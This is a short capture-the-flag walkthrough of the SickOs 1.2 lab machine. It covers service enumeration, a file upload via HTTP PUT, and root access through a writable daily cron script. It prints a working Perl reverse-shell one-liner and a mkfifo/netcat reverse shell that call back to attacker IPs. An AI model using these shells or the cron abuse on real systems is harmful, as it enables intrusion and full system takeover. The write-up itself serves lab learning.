SickOs: 1.2 Walkthrough

“So in war, the way is to avoid what is strong, and strike at what is weak.” ― Sun Tzu, The Art of War

This is second in following series from SickOs and is independent of the prior releases, scope of challenge is to gain highest privileges on the system.
SickOs: 1.2
This website uses 'cookies' to give you the best, most relevant experience. Using this website means you're happy with…

“So in war, the way is to avoid what is strong, and strike at what is weak.”
Sun Tzu, The Art of War


Enumeration

All starts with enumeration

📍 We might have to get credentials from web page and access the SSH.

📍 We might have LFI/SQLi/RCE on the web page.

📍 Could be something new…

Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10–4.11, Linux 3.16–4.6, Linux 3.2–4.9, Linux 4.4

OpenSSH 5.9p1 Debian 5ubuntu1.8

🔑 It is running linux — Ubuntu

More Enumeration…

  1. SSH

Just User Enumeration Vuln.

2. HTTP

  • Manual Walk + robots.txt + source code

Nothing on this.

  • Nikto scan
lighttpd/1.4.28 🔑
  • Gobuster

Finding POI(Point Of Intrusion)

mod_userdir is the possibility

No luck with this Vulnerabilities.

After a long struggle
Able to insert data using PUT
perl -e ‘use Socket;$i=”192.168.103.195";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

Got rshell with rport 443


Privilege Escalation

Found a cron job which is vulnerable. It is present in /etc/cron.daily

Do the following to get a root shell back…

echo ‘#!/bin/bash’ > update
echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.43.2 443 >/tmp/f’ >> update
chmod 777 update

catch the shell back when executed.